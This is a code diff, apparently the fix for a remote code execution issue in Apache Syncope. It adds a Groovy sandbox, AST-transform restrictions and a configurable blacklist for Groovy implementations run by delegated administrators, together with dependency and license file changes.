Apache Syncope: Remote Code Execution by delegated administrators

@@ -16,12 +16,10 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.core.persistence.api.dao.AccountRule
 import org.apache.syncope.core.persistence.api.entity.user.LinkedAccount
 import org.apache.syncope.core.persistence.api.entity.user.User
 
-@CompileStatic
 class MyAccountRule implements AccountRule {
   
   void enforce(String username) {

@@ -16,12 +16,10 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.core.persistence.api.attrvalue.validation.PlainAttrValueValidator
 import org.apache.syncope.core.persistence.api.entity.PlainAttrValue
 import org.apache.syncope.core.persistence.api.entity.PlainSchema
 
-@CompileStatic
 class MyAttrValueValidator implements PlainAttrValueValidator {
   
   @Override

@@ -16,11 +16,9 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.command.CommandArgs
 import org.apache.syncope.core.provisioning.api.macro.Command
 
-@CompileStatic
 class MyCommand implements Command<CommandArgs> {
 
   String run(CommandArgs args) {

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.util.List;
 import org.apache.commons.lang3.tuple.Pair
 import org.apache.syncope.common.lib.to.EntityTO
@@ -26,7 +25,6 @@ import org.apache.syncope.core.persistence.api.entity.Any
 import org.apache.syncope.core.persistence.api.entity.PlainAttrValue
 import org.apache.syncope.core.provisioning.api.data.ItemTransformer
 
-@CompileStatic
 class MyItemTransformer implements ItemTransformer {
 	
   @Override

@@ -16,14 +16,12 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.request.AnyCR
 import org.apache.syncope.common.lib.request.AnyUR
 import org.apache.syncope.common.lib.to.AnyTO
 import org.apache.syncope.common.lib.to.PropagationStatus
 import org.apache.syncope.core.logic.api.LogicActions
 
-@CompileStatic
 class MyLogicActions implements LogicActions {
   
   @Override
@@ -55,4 +53,4 @@ class MyLogicActions implements LogicActions {
   <A extends AnyTO> A afterDelete(A input, List<PropagationStatus> statuses) {
     return input;
   }
-}
\ No newline at end of file
+}

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.util.Map
 import java.util.Optional
 import javax.validation.ValidationException
@@ -25,7 +24,6 @@ import org.apache.syncope.common.lib.form.SyncopeForm
 import org.apache.syncope.core.provisioning.api.macro.Command
 import org.apache.syncope.core.provisioning.api.macro.MacroActions
 
-@CompileStatic
 class MyMacroActions implements MacroActions {
 
   @Override

@@ -16,12 +16,10 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.core.persistence.api.dao.PasswordRule
 import org.apache.syncope.core.persistence.api.entity.user.LinkedAccount
 import org.apache.syncope.core.persistence.api.entity.user.User
 
-@CompileStatic
 class MyPasswordRule implements PasswordRule {
   
   void enforce(String username, String clearPassword) {

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.util.Optional
 import java.util.Set
 import org.apache.syncope.common.lib.to.OrgUnit
@@ -26,7 +25,6 @@ import org.apache.syncope.core.provisioning.api.propagation.PropagationActions
 import org.apache.syncope.core.provisioning.api.propagation.PropagationTaskInfo;
 import org.identityconnectors.framework.common.objects.ConnectorObject
 
-@CompileStatic
 class MyPropagationActions implements PropagationActions {
   
   @Override

@@ -16,11 +16,9 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.to.Provision
 import org.apache.syncope.core.provisioning.api.ProvisionSorter
 
-@CompileStatic
 class MyProvisionSorter implements ProvisionSorter {
  
   @Override

@@ -16,7 +16,6 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.util.Set
 import org.apache.syncope.common.lib.request.AnyCR
 import org.apache.syncope.common.lib.request.AnyUR
@@ -34,7 +33,6 @@ import org.apache.syncope.core.provisioning.api.pushpull.PullActions
 import org.identityconnectors.framework.common.objects.SyncDelta
 import org.quartz.JobExecutionException
 
-@CompileStatic
 class MyPullActions implements PullActions {
 
   @Override

@@ -16,13 +16,11 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.to.Provision
 import org.apache.syncope.core.persistence.api.dao.PullCorrelationRule
 import org.apache.syncope.core.persistence.api.dao.search.SearchCond
 import org.identityconnectors.framework.common.objects.SyncDelta
 
-@CompileStatic
 class MyPullCorrelationRule implements PullCorrelationRule {
 
   @Override

@@ -16,15 +16,13 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.util.Set
 import org.apache.syncope.common.lib.to.ProvisioningReport
 import org.apache.syncope.core.persistence.api.entity.Entity
 import org.apache.syncope.core.provisioning.api.pushpull.ProvisioningProfile
 import org.apache.syncope.core.provisioning.api.pushpull.PushActions
 import org.quartz.JobExecutionException
 
-@CompileStatic
 class MyPushActions implements PushActions {
   
   @Override

@@ -16,14 +16,12 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.to.Provision
 import org.apache.syncope.core.persistence.api.dao.PushCorrelationRule
 import org.apache.syncope.core.persistence.api.entity.Any
 import org.apache.syncope.core.persistence.api.entity.ExternalResource
 import org.identityconnectors.framework.common.objects.filter.Filter
 
-@CompileStatic
 class MyPushCorrelationRule implements PushCorrelationRule {
 
   @Override

@@ -16,14 +16,12 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import java.util.Map
 import java.util.Set
 import org.apache.syncope.core.persistence.api.entity.Any
 import org.apache.syncope.core.persistence.api.entity.Notification
 import org.apache.syncope.core.provisioning.api.notification.RecipientsProvider
 
-@CompileStatic
 class MyRecipientsProvider implements RecipientsProvider {
   
   @Override

@@ -16,13 +16,11 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.core.provisioning.api.pushpull.ReconFilterBuilder
 import org.identityconnectors.framework.common.objects.ObjectClass
 import org.identityconnectors.framework.common.objects.filter.Filter
 import org.identityconnectors.framework.impl.api.local.operations.FilteredResultsHandler
 
-@CompileStatic
 class MyReconFilterBuilder implements ReconFilterBuilder {
   
   @Override

@@ -16,13 +16,11 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.report.ReportConf
 import org.apache.syncope.core.provisioning.api.job.report.ReportJobDelegate
 import org.quartz.JobExecutionContext
 import org.quartz.JobExecutionException
 
-@CompileStatic
 class MyReportJobDelegate implements ReportJobDelegate {	
 
   void interrupt() {

@@ -16,13 +16,11 @@
  * specific language governing permissions and limitations
  * under the License.
  */
-import groovy.transform.CompileStatic
 import org.apache.syncope.common.lib.types.TaskType
 import org.apache.syncope.core.provisioning.api.job.SchedTaskJobDelegate
 import org.quartz.JobExecutionContext
 import org.quartz.JobExecutionException
 
-@CompileStatic
 class MySchedTaskJobDelegate implements SchedTaskJobDelegate {
 
   void interrupt() {

@@ -0,0 +1,226 @@
+
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   APPENDIX: How to apply the Apache License to your work.
+
+      To apply the Apache License to your work, attach the following
+      boilerplate notice, with the fields enclosed by brackets "[]"
+      replaced with your own identifying information. (Don't include
+      the brackets!)  The text should be enclosed in the appropriate
+      comment syntax for the file format. We also recommend that a
+      file or class name and description of purpose be included on the
+      same "printed page" as the copyright notice for easier
+      identification within third-party archives.
+
+   Copyright [yyyy] [name of copyright owner]
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
+
+==
+
+For Admin LTE (https://github.com/almasaeed2010/AdminLTE/):
+This is licensed under the terms of the MIT license:
+
+ Permission is hereby granted, free  of charge, to any person obtaining
+ a  copy  of this  software  and  associated  documentation files  (the
+ "Software"), to  deal in  the Software without  restriction, including
+ without limitation  the rights to  use, copy, modify,  merge, publish,
+ distribute,  sublicense, and/or sell  copies of  the Software,  and to
+ permit persons to whom the Software  is furnished to do so, subject to
+ the following conditions:
+ 
+ The  above  copyright  notice  and  this permission  notice  shall  be
+ included in all copies or substantial portions of the Software.
+ 
+ THE  SOFTWARE IS  PROVIDED  "AS  IS", WITHOUT  WARRANTY  OF ANY  KIND,
+ EXPRESS OR  IMPLIED, INCLUDING  BUT NOT LIMITED  TO THE  WARRANTIES OF
+ MERCHANTABILITY,    FITNESS    FOR    A   PARTICULAR    PURPOSE    AND
+ NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
+ LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
+ OF CONTRACT, TORT OR OTHERWISE,  ARISING FROM, OUT OF OR IN CONNECTION
+ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

@@ -0,0 +1,13 @@
+Apache Syncope
+Copyright 2012-2023 The Apache Software Foundation
+
+This product includes software developed by:
+The Apache Software Foundation (http://www.apache.org/).
+
+The following copyright notice(s) were affixed to portions of this code
+with which this file is now or was at one time distributed.
+
+==
+
+This product includes software developed by the AdminLTE project.
+Copyright (c) 2014-2017 Abdullah Almsaeed

@@ -47,11 +47,6 @@ under the License.
       <artifactId>spring-context-support</artifactId>
     </dependency>
     
-    <dependency>
-      <groupId>org.aspectj</groupId>
-      <artifactId>aspectjweaver</artifactId>
-    </dependency>
-
     <dependency>
       <groupId>org.apache.tika</groupId>
       <artifactId>tika-core</artifactId>

@@ -60,7 +60,41 @@ under the License.
       <groupId>net.tirasa.connid</groupId>
       <artifactId>slf4j-logging</artifactId>
     </dependency>
-      
+
+    <dependency>
+      <groupId>org.apache.groovy</groupId>
+      <artifactId>groovy</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.groovy</groupId>
+      <artifactId>groovy-templates</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.groovy</groupId>
+      <artifactId>groovy-xml</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.groovy</groupId>
+      <artifactId>groovy-jsr223</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.groovy</groupId>
+      <artifactId>groovy-datetime</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.groovy</groupId>
+      <artifactId>groovy-dateutil</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.groovy</groupId>
+      <artifactId>groovy-sql</artifactId>
+    </dependency>
+
+    <dependency>
+      <groupId>net.tirasa</groupId>
+      <artifactId>groovy-security-sandbox</artifactId>
+    </dependency>
+
     <dependency>
       <groupId>org.apache.syncope.common.idm</groupId>
       <artifactId>syncope-common-idm-lib</artifactId>

@@ -72,35 +72,6 @@ under the License.
       <artifactId>pdfbox</artifactId>
     </dependency>
 
-    <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy</artifactId>
-    </dependency>
-    <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy-templates</artifactId>
-    </dependency>
-    <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy-xml</artifactId>
-    </dependency>
-    <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy-jsr223</artifactId>
-    </dependency>
-    <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy-datetime</artifactId>
-    </dependency>
-    <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy-dateutil</artifactId>
-    </dependency>
-    <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy-sql</artifactId>
-    </dependency>
-
     <dependency>
       <groupId>org.apache.syncope.core</groupId>
       <artifactId>syncope-core-workflow-api</artifactId>

@@ -156,7 +156,7 @@ public void execute(
             execution.setStatus(TaskJob.Status.SUCCESS.name());
 
             result = AuditElements.Result.SUCCESS;
-        } catch (JobExecutionException e) {
+        } catch (SecurityException | JobExecutionException e) {
             LOG.error("While executing task {}", taskKey, e);
             result = AuditElements.Result.FAILURE;
 

@@ -76,8 +76,8 @@ under the License.
     </dependency>
 
     <dependency>
-      <groupId>org.apache.groovy</groupId>
-      <artifactId>groovy</artifactId>
+      <groupId>org.aspectj</groupId>
+      <artifactId>aspectjweaver</artifactId>
     </dependency>
 
     <dependency>

@@ -0,0 +1,52 @@
+/*
+ * Licensed to the Apache Software Foundation (ASF) under one
+ * or more contributor license agreements.  See the NOTICE file
+ * distributed with this work for additional information
+ * regarding copyright ownership.  The ASF licenses this file
+ * to you under the Apache License, Version 2.0 (the
+ * "License"); you may not use this file except in compliance
+ * with the License.  You may obtain a copy of the License at
+ *
+ *   http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing,
+ * software distributed under the License is distributed on an
+ * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ * KIND, either express or implied.  See the License for the
+ * specific language governing permissions and limitations
+ * under the License.
+ */
+package org.apache.syncope.core.spring.implementation;
+
+import org.aspectj.lang.ProceedingJoinPoint;
+import org.aspectj.lang.annotation.Around;
+import org.aspectj.lang.annotation.Aspect;
+import org.jenkinsci.plugins.scriptsecurity.sandbox.Whitelist;
+import org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SandboxInterceptor;
+import org.kohsuke.groovy.sandbox.GroovyInterceptor;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+
+@Aspect
+public class GroovySandbox {
+
+    protected static final Logger LOG = LoggerFactory.getLogger(GroovySandbox.class);
+
+    protected final Whitelist whitelist;
+
+    public GroovySandbox(final Whitelist whitelist) {
+        this.whitelist = whitelist;
+    }
+
+    @Around("execution(* *(..))")
+    public Object around(final ProceedingJoinPoint joinPoint) throws Throwable {
+        GroovyInterceptor interceptor = new SandboxInterceptor(whitelist);
+        try {
+            interceptor.register();
+
+            return joinPoint.proceed();
+        } finally {
+            interceptor.unregister();
+        }
+    }
+}

@@ -18,6 +18,7 @@
  */
 package org.apache.syncope.core.spring.implementation;
 
+import groovy.grape.GrabAnnotationTransformation;
 import groovy.lang.GroovyClassLoader;
 import java.lang.reflect.Modifier;
 import java.lang.reflect.ParameterizedType;
@@ -26,6 +27,7 @@
 import java.util.HashMap;
 import java.util.Map;
 import java.util.Optional;
+import java.util.Set;
 import java.util.function.Consumer;
 import java.util.function.Supplier;
 import org.apache.commons.lang3.tuple.Pair;
@@ -36,6 +38,7 @@
 import org.apache.syncope.common.lib.policy.PushCorrelationRuleConf;
 import org.apache.syncope.common.lib.report.ReportConf;
 import org.apache.syncope.common.lib.types.IdRepoImplementationType;
+import org.apache.syncope.common.lib.types.ImplementationEngine;
 import org.apache.syncope.common.lib.types.ImplementationTypesHolder;
 import org.apache.syncope.core.persistence.api.entity.Implementation;
 import org.apache.syncope.core.provisioning.api.ImplementationLookup;
@@ -46,13 +49,26 @@
 import org.apache.syncope.core.provisioning.api.rules.PushCorrelationRule;
 import org.apache.syncope.core.provisioning.api.serialization.POJOHelper;
 import org.apache.syncope.core.spring.ApplicationContextProvider;
+import org.codehaus.groovy.control.CompilerConfiguration;
+import org.jenkinsci.plugins.scriptsecurity.sandbox.blacklists.Blacklist;
+import org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.RejectASTTransformsCustomizer;
+import org.kohsuke.groovy.sandbox.SandboxTransformer;
+import org.springframework.aop.aspectj.annotation.AspectJProxyFactory;
 
 public final class ImplementationManager {
 
-    private static final GroovyClassLoader GROOVY_CLASSLOADER = new GroovyClassLoader();
+    private static final GroovyClassLoader GROOVY_CLASSLOADER;
 
     private static final Map<String, Class<?>> CLASS_CACHE = Collections.synchronizedMap(new HashMap<>());
 
+    static {
+        CompilerConfiguration cc = new CompilerConfiguration();
+        cc.addCompilationCustomizers(new RejectASTTransformsCustomizer(), new SandboxTransformer());
+        cc.setDisabledGlobalASTTransformations(Set.of(GrabAnnotationTransformation.class.getName()));
+
+        GROOVY_CLASSLOADER = new GroovyClassLoader(Thread.currentThread().getContextClassLoader(), cc);
+    }
+
     @SuppressWarnings("unchecked")
     public static Optional<ReportJobDelegate> buildReportJobDelegate(
             final Implementation impl,
@@ -75,7 +91,7 @@ public static Optional<ReportJobDelegate> buildReportJobDelegate(
                     return Optional.empty();
                 }
 
-                ReportJobDelegate report = build(clazz, true, cacheGetter, cachePutter);
+                ReportJobDelegate report = build(clazz, true, impl.getEngine(), cacheGetter, cachePutter);
                 report.setConf(conf);
                 return Optional.of(report);
         }
@@ -102,7 +118,7 @@ public static Optional<AccountRule> buildAccountRule(
                     return Optional.empty();
                 }
 
-                AccountRule rule = build(clazz, true, cacheGetter, cachePutter);
+                AccountRule rule = build(clazz, true, impl.getEngine(), cacheGetter, cachePutter);
                 rule.setConf(conf);
                 return Optional.of(rule);
         }
@@ -129,7 +145,7 @@ public static Optional<PasswordRule> buildPasswordRule(
                     return Optional.empty();
                 }
 
-                PasswordRule rule = build(clazz, true, cacheGetter, cachePutter);
+                PasswordRule rule = build(clazz, true, impl.getEngine(), cacheGetter, cachePutter);
                 rule.setConf(conf);
                 return Optional.of(rule);
         }
@@ -157,7 +173,7 @@ public static Optional<PullCorrelationRule> buildPullCorrelationRule(
                     return Optional.empty();
                 }
 
-                PullCorrelationRule rule = build(clazz, true, cacheGetter, cachePutter);
+                PullCorrelationRule rule = build(clazz, true, impl.getEngine(), cacheGetter, cachePutter);
                 rule.setConf(conf);
                 return Optional.of(rule);
         }
@@ -185,7 +201,7 @@ public static Optional<PushCorrelationRule> buildPushCorrelationRule(
                     return Optional.empty();
                 }
 
-                PushCorrelationRule rule = build(clazz, true, cacheGetter, cachePutter);
+                PushCorrelationRule rule = build(clazz, true, impl.getEngine(), cacheGetter, cachePutter);
                 rule.setConf(conf);
                 return Optional.of(rule);
         }
@@ -251,15 +267,27 @@ private static <T> Pair<Class<T>, Boolean> getClass(final Implementation impl) t
         return Pair.of((Class<T>) clazz, false);
     }
 
+    private static <T> T createBean(final Class<T> clazz, final ImplementationEngine engine) {
+        T bean = ApplicationContextProvider.getBeanFactory().createBean(clazz);
+        if (engine == ImplementationEngine.GROOVY) {
+            AspectJProxyFactory factory = new AspectJProxyFactory(bean);
+            factory.addAspect(new GroovySandbox(
+                    ApplicationContextProvider.getApplicationContext().getBean(Blacklist.class)));
+            bean = factory.getProxy();
+        }
+        return bean;
+    }
+
     @SuppressWarnings("unchecked")
     public static <T> T build(final Implementation impl) throws ClassNotFoundException {
-        return (T) ApplicationContextProvider.getBeanFactory().createBean(getClass(impl).getLeft());
+        return createBean((Class<T>) getClass(impl).getLeft(), impl.getEngine());
     }
 
     @SuppressWarnings("unchecked")
     private static <T> T build(
             final Class<T> clazz,
             final boolean classCached,
+            final ImplementationEngine engine,
             final Supplier<T> cacheGetter,
             final Consumer<T> cachePutter) {
 
@@ -271,7 +299,7 @@ private static <T> T build(
             instance = cacheGetter.get();
         }
         if (instance == null) {
-            instance = ApplicationContextProvider.getBeanFactory().createBean(clazz);
+            instance = createBean(clazz, engine);
 
             if (perContext) {
                 cachePutter.accept(instance);
@@ -286,7 +314,7 @@ public static <T> T build(final Implementation impl, final Supplier<T> cacheGett
 
         Pair<Class<T>, Boolean> clazz = getClass(impl);
 
-        return build(clazz.getLeft(), clazz.getRight(), cacheGetter, cachePutter);
+        return build(clazz.getLeft(), clazz.getRight(), impl.getEngine(), cacheGetter, cachePutter);
     }
 
     public static Class<?> purge(final String implementation) {

@@ -21,6 +21,10 @@
 import com.nimbusds.jose.JOSEException;
 import com.nimbusds.jose.JWSAlgorithm;
 import com.nimbusds.jose.KeyLengthException;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.InputStreamReader;
+import java.io.Reader;
 import java.security.NoSuchAlgorithmException;
 import java.security.spec.InvalidKeySpecException;
 import org.apache.syncope.common.lib.types.CipherAlgorithm;
@@ -32,17 +36,21 @@
 import org.apache.syncope.core.spring.policy.DefaultRuleEnforcer;
 import org.apache.syncope.core.spring.security.jws.AccessTokenJWSSigner;
 import org.apache.syncope.core.spring.security.jws.AccessTokenJWSVerifier;
+import org.jenkinsci.plugins.scriptsecurity.sandbox.blacklists.Blacklist;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.beans.factory.config.BeanDefinition;
 import org.springframework.boot.autoconfigure.condition.ConditionalOnMissingBean;
 import org.springframework.boot.context.properties.EnableConfigurationProperties;
 import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
+import org.springframework.context.annotation.EnableAspectJAutoProxy;
 import org.springframework.context.annotation.Role;
+import org.springframework.core.io.ResourceLoader;
 import org.springframework.security.config.core.GrantedAuthorityDefaults;
 
 @EnableConfigurationProperties(SecurityProperties.class)
+@EnableAspectJAutoProxy(proxyTargetClass = false)
 @Configuration(proxyBeanMethods = false)
 public class SecurityContext {
 
@@ -146,4 +154,16 @@ public RuleEnforcer ruleEnforcer(final RealmDAO realmDAO) {
     public ApplicationContextProvider applicationContextProvider() {
         return new ApplicationContextProvider();
     }
+
+    @ConditionalOnMissingBean
+    @Bean
+    public Blacklist groovyBlackList(final ResourceLoader resourceLoader, final SecurityProperties props)
+            throws IOException {
+
+        try (InputStream in = resourceLoader.getResource(props.getGroovyBlacklist()).getInputStream();
+                Reader reader = new InputStreamReader(in)) {
+
+            return new Blacklist(reader);
+        }
+    }
 }

@@ -100,6 +100,8 @@ public void setUseLenientSaltSizeCheck(final boolean useLenientSaltSizeCheck) {
 
     private String secretKey;
 
+    private String groovyBlacklist = "classpath:META-INF/groovy.blacklist";
+
     private final DigesterProperties digester = new DigesterProperties();
 
     public String getAdminUser() {
@@ -174,6 +176,14 @@ public void setSecretKey(final String secretKey) {
         this.secretKey = secretKey;
     }
 
+    public String getGroovyBlacklist() {
+        return groovyBlacklist;
+    }
+
+    public void setGroovyBlacklist(final String groovyBlacklist) {
+        this.groovyBlacklist = groovyBlacklist;
+    }
+
     public DigesterProperties getDigester() {
         return digester;
     }

@@ -0,0 +1,112 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
